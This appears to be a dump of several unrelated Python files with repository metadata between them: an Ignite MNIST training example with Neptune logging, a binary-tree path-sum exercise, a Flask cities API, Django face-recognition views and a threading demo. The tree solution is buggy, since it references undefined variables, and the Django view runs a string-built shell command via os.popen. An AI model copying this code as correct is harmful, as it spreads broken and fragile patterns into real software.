""" MNIST example with training and validation monitoring using Neptune. Requirements: Neptune: `pip install neptune-client` Usage: Run the example: ```bash python mnist_with_neptune_logger.py ``` Go to https://neptune.ai and explore your experiment. Note: You can see an example experiment here: https://ui.neptune.ai/o/neptune-ai/org/pytorch-ignite-integration/e/PYTOR-26/charts """ import sys from argparse import ArgumentParser import logging import torch from torch.utils.data import DataLoader from torch import nn import torch.nn.functional as F from torch.optim import SGD from torchvision.datasets import MNIST from torchvision.transforms import Compose, ToTensor, Normalize from ignite.engine import Events, create_supervised_trainer, create_supervised_evaluator from ignite.metrics import Accuracy, Loss from ignite.contrib.handlers.neptune_logger import * LOG_INTERVAL = 10 class Net(nn.Module): def __init__(self): super(Net, self).__init__() self.conv1 = nn.Conv2d(1, 10, kernel_size=5) self.conv2 = nn.Conv2d(10, 20, kernel_size=5) self.conv2_drop = nn.Dropout2d() self.fc1 = nn.Linear(320, 50) self.fc2 = nn.Linear(50, 10) def forward(self, x): x = F.relu(F.max_pool2d(self.conv1(x), 2)) x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2)) x = x.view(-1, 320) x = F.relu(self.fc1(x)) x = F.dropout(x, training=self.training) x = self.fc2(x) return F.log_softmax(x, dim=-1) def get_data_loaders(train_batch_size, val_batch_size): data_transform = Compose([ToTensor(), Normalize((0.1307,), (0.3081,))]) train_loader = DataLoader(MNIST(download=True, root=".", transform=data_transform, train=True), batch_size=train_batch_size, shuffle=True) val_loader = DataLoader(MNIST(download=False, root=".", transform=data_transform, train=False), batch_size=val_batch_size, shuffle=False) return train_loader, val_loader def run(train_batch_size, val_batch_size, epochs, lr, momentum, neptune_project): train_loader, val_loader = get_data_loaders(train_batch_size, val_batch_size) model = Net() device = 'cpu' if torch.cuda.is_available(): device = 'cuda' optimizer = SGD(model.parameters(), lr=lr, momentum=momentum) criterion = nn.CrossEntropyLoss() trainer = create_supervised_trainer(model, optimizer, criterion, device=device) if sys.version_info > (3,): from ignite.contrib.metrics.gpu_info import GpuInfo try: GpuInfo().attach(trainer) except RuntimeError: print("INFO: By default, in this example it is possible to log GPU information (used memory, utilization). " "As there is no pynvml python package installed, GPU information won't be logged. Otherwise, please " "install it : `pip install pynvml`") metrics = { 'accuracy': Accuracy(), 'loss': Loss(criterion) } train_evaluator = create_supervised_evaluator(model, metrics=metrics, device=device) validation_evaluator = create_supervised_evaluator(model, metrics=metrics, device=device) @trainer.on(Events.EPOCH_COMPLETED) def compute_metrics(engine): train_evaluator.run(train_loader) validation_evaluator.run(val_loader) npt_logger = NeptuneLogger(api_token=None, project_name=neptune_project, name='ignite-mnist-example', params={'train_batch_size': train_batch_size, 'val_batch_size': val_batch_size, 'epochs': epochs, 'lr': lr, 'momentum': momentum}) npt_logger.attach(trainer, log_handler=OutputHandler(tag="training", output_transform=lambda loss: {'batchloss': loss}, metric_names='all'), event_name=Events.ITERATION_COMPLETED(every=100)) npt_logger.attach(train_evaluator, log_handler=OutputHandler(tag="training", metric_names=["loss", "accuracy"], another_engine=trainer), event_name=Events.EPOCH_COMPLETED) npt_logger.attach(validation_evaluator, log_handler=OutputHandler(tag="validation", metric_names=["loss", "accuracy"], another_engine=trainer), event_name=Events.EPOCH_COMPLETED) npt_logger.attach(trainer, log_handler=OptimizerParamsHandler(optimizer), event_name=Events.ITERATION_COMPLETED(every=100)) npt_logger.attach(trainer, log_handler=WeightsScalarHandler(model), event_name=Events.ITERATION_COMPLETED(every=100)) npt_logger.attach(trainer, log_handler=GradsScalarHandler(model), event_name=Events.ITERATION_COMPLETED(every=100)) # kick everything off trainer.run(train_loader, max_epochs=epochs) npt_logger.close() if __name__ == "__main__": parser = ArgumentParser() parser.add_argument('--batch_size', type=int, default=64, help='input batch size for training (default: 64)') parser.add_argument('--val_batch_size', type=int, default=1000, help='input batch size for validation (default: 1000)') parser.add_argument('--epochs', type=int, default=10, help='number of epochs to train (default: 10)') parser.add_argument('--lr', type=float, default=0.01, help='learning rate (default: 0.01)') parser.add_argument('--momentum', type=float, default=0.5, help='SGD momentum (default: 0.5)') parser.add_argument("--neptune_project", type=str, help="your project in neptune.ai") args = parser.parse_args() # Setup engine logger logger = logging.getLogger("ignite.engine.engine.Engine") handler = logging.StreamHandler() formatter = logging.Formatter("%(asctime)s %(name)-12s %(levelname)-8s %(message)s") handler.setFormatter(formatter) logger.addHandler(handler) logger.setLevel(logging.INFO) run(args.batch_size, args.val_batch_size, args.epochs, args.lr, args.momentum, args.neptune_project)
605f934856fa73abaca59a8d4b985a30749fa454
f47ac8d59fe1c0f807d699fe5b5991ed3662bfdb
/binary24.py
9cad221c86da71526bc3fda5faefd88b49ae47c7
[]
no_license
YanglanWang/jianzhi_offer
5561d8a29881d8504b23446353e9f969c01ed0c5
1c568f399ed6ac1017671c40c765e609c1b6d178
refs/heads/master
2020-06-16T10:41:44.979558
2019-08-03T09:07:37
2019-08-03T09:07:37
195,543,754
0
0
null
null
null
null
UTF-8
Python
false
false
1,224
py
import create_tree class TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None class Solution: # def FindPath(self, root, expectNumber): # # write code here # start=root # if start==None: # return [] # if start.left==None and start.right==None and start.val==expectNumber: # return [[start.val]] # leftpath=self.FindPath(start.left,expectNumber-start.val) # rightpath=self.FindPath(start.right,expectNumber-start.val) # for i in leftpath+rightpath: # i=i.insert(0,start.val) # return leftpath+rightpath def FindPath(self, root, expectNumber): if root.left==None and root.right==None: if root.val==expectNumber: return [[root.val]] else: return [] if root.left!=None: a=self.FindPath(root.left,expectNumber-root.val) if root.right!=None: b=self.FindPath(root.right,expectNumber-root.val) for i in a+b: i.insert(0,root.val) return a+b a=Solution() root=create_tree.fromList([10,5,12,4,7]) b=a.FindPath(root,22) print(b)
4ad984ec5a966cb62eaeb618dfbc4aafb9fcd4f7
7100c3c8012dcf2bc6427bf33c55662bc61924f2
/api/v1/views/cities.py
ecabd72acf87d8cdd29c4b5dfb6bb78c183ae1ca
[ "LicenseRef-scancode-public-domain" ]
permissive
OscarDRT/AirBnB_clone_v3
c3ffa7b7ffb5182143b0f37c8ef7d1342cdffa0a
9f015b7f1aa1b9c7f7f0d85fd7f5dc97a6679e9c
refs/heads/master
2022-05-27T07:35:53.627606
2020-04-29T21:55:33
2020-04-29T21:55:33
259,408,927
0
0
null
null
null
null
UTF-8
Python
false
false
1,956
py
#!/usr/bin/python3 """Documentation""" from flask import Flask, jsonify, abort, make_response, request from api.v1.views import app_views from models.state import * from models.city import * from models import storage @app_views.route('/states/<state_id>/cities', methods=['GET', 'POST'], strict_slashes=False) def cities_li(state_id): """cities""" state = storage.get(State, state_id) if state is None: abort(404) if request.method == 'GET': cities_list = [] for key, value in storage.all('City').items(): if value.state_id == str(state_id): cities_list.append(value.to_dict()) return jsonify(cities_list) if request.method == 'POST': data = request.get_json() if data is None: return (jsonify({"error": "Not a JSON"}), 400) if 'name' in data: data['state_id'] = state_id city = City(**data) city.save() data2 = storage.get(City, city.id).to_dict() return make_response(jsonify(data2), 201) return (jsonify({"error": "Missing name"}), 400) @app_views.route('/cities/<city_id>', methods=['GET', 'DELETE', 'PUT'], strict_slashes=False) def my_city(city_id): """city""" city = storage.get(City, city_id) if city is None: abort(404) if request.method == 'GET': return jsonify(city.to_dict()) if request.method == 'DELETE': storage.delete(city) storage.save() return jsonify({}), 200 if request.method == 'PUT': data = request.get_json() if data is None: return (jsonify({"error": "Not a JSON"}), 400) ignorekey = ['id', 'created_at', 'updated_at'] for key, value in data.items(): if key not in ignorekey: setattr(city, key, value) city.save() return jsonify(city.to_dict()), 200
707533be29f322011c761603977cdb06d18f4ac2
972aca82afd04ec6cbb4bf7225e3dcd56fe6f3f0
/face_recog/recognition/views.py
044b04aa9c2b8708a1c1e95018615f2a28c6cf5a
[]
no_license
sbhusal123/On-web-face-recognition
a41b05e53e691648f5c0296f6ad919e353e07221
5ff56aacce759656af407ac2cba03f72b2ce3de4
refs/heads/master
2022-02-25T16:12:58.746395
2019-09-07T06:06:37
2019-09-07T06:06:37
166,095,690
0
0
null
null
null
null
UTF-8
Python
false
false
1,841
py
from django.shortcuts import render,HttpResponse from django.core.files.storage import FileSystemStorage import os import shutil from django.conf import settings from .models import User # Create your views here. def index(request): if request.method == 'POST' and request.FILES['myfile']: try: os.remove(os.path.join(settings.BASE_DIR, 'media/test_file/test_image.jpg')) except: pass myfile = request.FILES['myfile'] myfile.name = "test_image.jpg" fs = FileSystemStorage(location="media/test_file") filename = fs.save(myfile.name, myfile) uploaded_file_url = "/media/test_file/test_image.jpg" print(uploaded_file_url) return render(request, 'index.html',{'uploaded_file_url':uploaded_file_url}) return render(request,'index.html') def registerUser(request): if request.method == 'POST' and request.FILES['profile_image']: username= request.POST["username"] myfile = request.FILES['profile_image'] myfile.name = username+".jpeg" User.objects.create(username=username,profile_pic = myfile) return render(request, 'index.html') return render(request,'index.html') def Scan(request): if request.method =="POST": name_list = [] unknown_pictures = os.path.join(settings.BASE_DIR,'/media/test_file') known_pictures = os.path.join(settings.BASE_DIR, '/media/profile_image') command = "face_recognition ."+known_pictures+" ."+unknown_pictures+"" out = os.popen(command).read() each_line = out.split("\n") each_line.remove("") for l in each_line: name = l.split(",")[1] name_list.append(name) return render(request, 'index.html',{'found':name_list}) return render(request, 'index.html')
[ "=" ]
=
15632584457de864ad6c921b7228c6996d3390a5
ebdeaa70f6e30abab03a1589bcdd56d1339151ef
/day18Python多线程/day18-多线程/code1/耗时操作.py
4fe94df37f17e3955e313560c7b922708e178a96
[]
no_license
gilgameshzzz/learn
490d8eb408d064473fdbfa3f1f854c2f163a7ef6
d476af77a6163ef4f273087582cbecd7f2ec15e6
refs/heads/master
2020-03-31T11:32:42.909453
2018-11-22T03:34:45
2018-11-22T03:34:45
152,181,143
0
0
null
null
null
null
UTF-8
Python
false
false
795
py
"""__author__ = 余婷""" import pygame from random import randint import time """ 1.耗时操作放到主线程中的问题: 耗时操作放到主线程中,会阻塞线程 多个耗时操作都放到一个线程中执行,最终执行的时间是两个耗时操作的时间和 2.怎么解决问题? 使用多线程(创建多个线程) """ def rand_color(): return randint(0, 255),randint(0, 255),randint(0, 255) def long_time(): print('耗时操作开始') time.sleep(10) print('耗时操作结束') def download(file): print('开始下载',file) time.sleep(10) print(file, '下载结束') if __name__ == '__main__': print('====') print(time.time()) download('狄仁杰') download('爱情公寓') print(time.time()) print('!!!')